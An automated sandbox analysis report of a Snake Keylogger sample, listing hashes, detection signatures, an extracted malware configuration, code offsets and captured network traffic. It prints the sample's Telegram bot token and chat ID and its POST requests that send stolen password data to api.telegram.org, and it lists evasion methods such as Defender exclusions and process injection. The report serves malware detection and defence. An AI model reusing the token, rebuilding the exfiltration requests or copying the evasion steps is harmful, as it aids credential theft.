Windows Analysis Report
rPO0977-6745.exe

Overview

General Information

Sample name: rPO0977-6745.exe
Analysis ID: 1480082
MD5: 978148253c4b65b751fcd3cb4713f614
SHA1: cbd9c5fee022b52a38abdedd536d22310f1b0870
SHA256: c45dce6c441601cf7fd1c78d7697b3f3a5b1d27041417eb0ca7f26e98ccf1de9
Tags: exeSnakeKeylogger
Infos:

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000017.00000002.3693041192.0000000002791000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendMessage?chat_id=5535403842"}
Source: rPO0977-6745.exe.2916.10.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendMessage"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe ReversingLabs: Detection: 44%
Multi AV Scanner detection for submitted file
Source: rPO0977-6745.exe ReversingLabs: Detection: 44%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: rPO0977-6745.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: rPO0977-6745.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49713 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49741 version: TLS 1.2
Source: rPO0977-6745.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ikFw.pdbSHA256 source: rPO0977-6745.exe, EDyxAgkldisLe.exe.0.dr
Source: Binary string: ikFw.pdb source: rPO0977-6745.exe, EDyxAgkldisLe.exe.0.dr
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 08D1938Bh 0_2_08D195B6
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 0144E61Fh 10_2_0144E431
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 0144EFA9h 10_2_0144E431
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 0144FA39h 10_2_0144F778
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 10_2_0144E005
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 10_2_0144D7F0
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 10_2_0144DE23
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 06BB88EDh 10_2_06BB85B0
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 06BB6119h 10_2_06BB5E70
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 06BB72A2h 10_2_06BB6FF8
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 06BB69C9h 10_2_06BB6720
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 06BB0741h 10_2_06BB0498
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 06BB76F9h 10_2_06BB7450
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 06BB5869h 10_2_06BB55C0
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 06BB7FA9h 10_2_06BB7D00
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 06BB6571h 10_2_06BB62C8
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 06BB5CC1h 10_2_06BB5A18
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 06BB6E21h 10_2_06BB6B78
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 10_2_06BB3360
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 10_2_06BB3350
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 06BB7B51h 10_2_06BB78A8
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 06BB0B99h 10_2_06BB08F0
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 06BB02E9h 10_2_06BB0040
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 06BB8401h 10_2_06BB8158
Source: C:\Users\user\Desktop\rPO0977-6745.exe Code function: 4x nop then jmp 06BB53E9h 10_2_06BB5140
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 08728633h 11_2_0872885E
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 00E4E61Fh 23_2_00E4E431
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 00E4EFA9h 23_2_00E4E431
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 00E4FA39h 23_2_00E4F77F
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 23_2_00E4D7F0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 064E88EDh 23_2_064E85B0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 064E6119h 23_2_064E5E70
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 064E5CC1h 23_2_064E5A18
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 064E6571h 23_2_064E62C8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 23_2_064E3350
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 23_2_064E3360
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 064E6E21h 23_2_064E6B78
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 064E69C9h 23_2_064E6720
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 064E72A2h 23_2_064E6FF8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 064E02E9h 23_2_064E0040
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 064E76F9h 23_2_064E7450
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 064E0B99h 23_2_064E08F0
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 064E0741h 23_2_064E0498
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 064E7B51h 23_2_064E78A8
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 064E53E9h 23_2_064E5140
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 064E8401h 23_2_064E8158
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 064E7FA9h 23_2_064E7D00
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Code function: 4x nop then jmp 064E5869h 23_2_064E55C0

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: POST /bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcac7a674eafb1Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: POST /bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcac9db89d7b60Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49713 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: unknown HTTP traffic detected: POST /bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcac7a674eafb1Host: api.telegram.orgContent-Length: 551Connection: Keep-Alive
Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000285B000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003088000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000307B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000302B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000003096000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002943000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000284F000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002924000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002909000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000289E000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.000000000285B000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002952000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
